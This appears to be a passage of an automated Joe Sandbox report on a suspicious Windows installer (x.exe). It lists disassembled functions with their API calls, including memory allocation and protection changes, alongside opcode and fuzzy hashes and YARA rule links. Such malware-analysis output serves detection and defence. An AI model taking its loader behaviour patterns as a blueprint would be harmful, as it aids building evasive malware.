                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 4ebd5535ffd0a4e41f5352dc030421f8bb865cc25a132c6cf26c601cc10009b4
                                                  • Instruction ID: d03ab6a5e47df52ccf3a1c7873ec34ccd0f93c855a8f03577e23eb658a8f1623
                                                  • Opcode Fuzzy Hash: 4ebd5535ffd0a4e41f5352dc030421f8bb865cc25a132c6cf26c601cc10009b4
                                                  • Instruction Fuzzy Hash: 54D09E71158201AEDF054F20DE4AF1FBA65EF84710F114A2CF5A2D40F0DA718855AA11
                                                  Function 73AD2BC4 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?), ref: 73AD2C83
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: de865a2bfd0d763dba057852f049ad2a8686fe725f3e8ac3009eb82fcd2184ba
                                                  • Instruction ID: 5d2c9c6c0d72f61301100180e0df06467e0e9c62709bb0ce407b943f611e2fa0
                                                  • Opcode Fuzzy Hash: de865a2bfd0d763dba057852f049ad2a8686fe725f3e8ac3009eb82fcd2184ba
                                                  • Instruction Fuzzy Hash: 154170B29203089FEF10AF75EA87B4937B5EB08254F30452BE5098A2ACD735D562CB90
                                                  Function 004066C7 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00791E00,00403123,?,00791E00,?,00791E00,?,?), ref: 004066DE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                  • Instruction ID: ca43ab2021c48c6ed20ae07fed446d3e058249cf91169c4d6ccd6ea6d786ecf5
                                                  • Opcode Fuzzy Hash: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                  • Instruction Fuzzy Hash: 06E04F32200018BB8F204F46CC04D9FFF6CEE956A07014026F905E2110D672EA21C6E4
                                                  Function 00406608 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00402FA5,?,00000004,00000000,00000000,00000000,00000000), ref: 0040661F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: bd304702ca55fb74df8d559d79e235c3fa1ae846be4974c670cc6582d5ef9c9a
                                                  • Instruction ID: 05bac8184c74b89d57db3688415717db9778dff1ee84c3d008638f7d30794d88
                                                  • Opcode Fuzzy Hash: bd304702ca55fb74df8d559d79e235c3fa1ae846be4974c670cc6582d5ef9c9a
                                                  • Instruction Fuzzy Hash: E1E04632600029BB8F208F9ADC08D9FBFBCEF916A0B024026B805E2110D671EA11CAE4
                                                  Function 73AD19C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(73AD501C,00000004,00000040,73AD5034), ref: 73AD19E5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: aa1202b3d2a83a44fe4a36d8322e2011657a4e77144636b43c1a435941a7e7c2
                                                  • Instruction ID: fbc364a7f38c81b66dc28f8e6f63e72a7f9a21bb7a46c28f85666d2bbda2c306
                                                  • Opcode Fuzzy Hash: aa1202b3d2a83a44fe4a36d8322e2011657a4e77144636b43c1a435941a7e7c2
                                                  • Instruction Fuzzy Hash: 04F098F2939340DEDB18AF2AB546B093AA0F719345B20852EF65DDA34DC33041229F9A
                                                  Function 0040600B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,0079F640,00000000,00000000,?,00000400,00000000,?,00406665,00000400,0079F640,?,00000000,Call,?,?), ref: 0040602F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                  • Instruction ID: ebd9b90c314e4c6716f0288355afd2849620ca31031a4bc7455833a411c7a122
                                                  • Opcode Fuzzy Hash: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                  • Instruction Fuzzy Hash: 65D0123204020EBFDF119F90ED05FAB3B1DEB08350F004826FE06A40A1D775D530AB64
                                                  Function 00402F40 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004033AC,00048BE4,?,?,?,?,?), ref: 00402F4E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                  • Instruction ID: 6676b4682d1b1505b733c47c67c1370fa0461ed9fa78b3ce244d4aa898b8dae2
                                                  • Opcode Fuzzy Hash: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                  • Instruction Fuzzy Hash: A3B09231540200AADA214F009E0AF057A21BB94700F208824B2A0280F086711060EA0D

                                                  Non-executed Functions

                                                  Function 00404D44 Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404D83
                                                  • ShowWindow.USER32(?), ref: 00404DAD
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DBE
                                                  • ShowWindow.USER32(?,00000004), ref: 00404DDA
                                                  • GetDlgItem.USER32(?,00000001), ref: 00404F01
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404F0B
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00404F25
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404F73
                                                  • GetDlgItem.USER32(?,00000003), ref: 00405022
                                                  • ShowWindow.USER32(00000000,?), ref: 0040504B
                                                  • EnableWindow.USER32(?,?), ref: 0040505F
                                                  • EnableWindow.USER32(?), ref: 00405073
                                                  • EnableWindow.USER32(?), ref: 0040508B
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004050A2
                                                  • EnableMenuItem.USER32(00000000), ref: 004050A9
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004050BA
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004050D1
                                                  • lstrlenA.KERNEL32(0079DE10,?,0079DE10,00000000), ref: 00405102
                                                    • Part of subcall function 00405C08: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  • SetWindowTextA.USER32(?,0079DE10), ref: 00405118
                                                    • Part of subcall function 00401399: MulDiv.KERNEL32(00000000,00007530,00000000), ref: 004013F9
                                                    • Part of subcall function 00401399: SendMessageA.USER32(?,00000402,00000000), ref: 00401409
                                                  • DestroyWindow.USER32(?,00000000), ref: 00405160
                                                  • CreateDialogParamA.USER32(?,?,FF85D79F), ref: 00405194
                                                    • Part of subcall function 004052CA: SetDlgItemTextA.USER32(?,?,00000000), ref: 004052E4
                                                  • GetDlgItem.USER32(?,000003FA), ref: 004051BD
                                                  • GetWindowRect.USER32(00000000), ref: 004051C4
                                                  • ScreenToClient.USER32(?,?), ref: 004051D0
                                                  • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 004051E9
                                                  • ShowWindow.USER32(00000008,?,00000000), ref: 00405208
                                                    • Part of subcall function 00405298: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004052AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040524E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3304020681-0
                                                  • Opcode ID: 9e89432b1bdca832879b970f2ef1913fa5e31831880cef7cabffaa785620b88a
                                                  • Instruction ID: daf878dbb0fe506a95ac5aa8a7a8fd29926fe041031fb44bae1ffc41b04d5d8a
                                                  • Opcode Fuzzy Hash: 9e89432b1bdca832879b970f2ef1913fa5e31831880cef7cabffaa785620b88a
                                                  • Instruction Fuzzy Hash: CFD1D3B1504614EBDB20AF25ED4491B7BA8FB89354F00453EF645B22E1CB3C9852DFAD
                                                  Function 00406039 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 123memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,76758A60,?,00405FC7,?,?), ref: 0040606A
                                                  • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 00406073
                                                  • GetShortPathNameA.KERNEL32(?,007A0A88,00000400), ref: 00406090
                                                  • wsprintfA.USER32 ref: 004060AE
                                                  • GetFileSize.KERNEL32(00000000,00000000,007A0A88,C0000000,00000004,007A0A88,?), ref: 004060E6
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004060F6
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406126
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A0688,00000000,-0000000A,00408704,00000000,[Rename],00000000,00000000,00000000), ref: 00406146
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406158
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040615F
                                                    • Part of subcall function 004065DB: GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                    • Part of subcall function 004065DB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2900126502-1727408572
                                                  • Opcode ID: 0b08d87e99941488f3443e01b1849f7776e59dc873762c427908d9fc1b1211e2
                                                  • Instruction ID: 881d5a06b33b51acfdd56e94407a7bb8708709a660f4e77e233cfe3e0cd730f2
                                                  • Opcode Fuzzy Hash: 0b08d87e99941488f3443e01b1849f7776e59dc873762c427908d9fc1b1211e2
                                                  • Instruction Fuzzy Hash: 5A3114B02006117BD62027358E49E6B365DDF81719F16083EF903BA2C3EE3DD82686BC
                                                  Function 004069AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                  • CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                  • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                  • CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  Strings
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004069B6
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004069B1
                                                  • *?|<>/":, xrefs: 00406A05
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                  • API String ID: 589700163-2188270913
                                                  • Opcode ID: 1fa643219522464caf3af4bb2876b6f7dd3ce8fd2f1d6c4a65fd6b92b46d134d
                                                  • Instruction ID: 07eff5cc72d9999094b905a7836252b4e7207ab828467c82055de66064a8a9fe
                                                  • Opcode Fuzzy Hash: 1fa643219522464caf3af4bb2876b6f7dd3ce8fd2f1d6c4a65fd6b92b46d134d
                                                  • Instruction Fuzzy Hash: 9A110461A893D55AE731AA385C0076BBF984F67390F1A407FE4C233382E6394C1583AA
                                                  Function 73AD2128 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 73AD12C6: GlobalAlloc.KERNEL32(00000040,73AD11C4,-000000A0), ref: 73AD12CE
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2228
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD225D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 396c2b63d09b6f27c50ed9aa8d1723e770c4964095cf08ce92d2fd4c28889a95
                                                  • Instruction ID: fb69f0a4c042a9be79ae875b814321a16da4b495b7a886405bd00bca949bf2fd
                                                  • Opcode Fuzzy Hash: 396c2b63d09b6f27c50ed9aa8d1723e770c4964095cf08ce92d2fd4c28889a95
                                                  • Instruction Fuzzy Hash: 28412432124108EFE71A9F65DD4BF2A7BB9FB49300F10416EF90A9619CDB35A852CB61
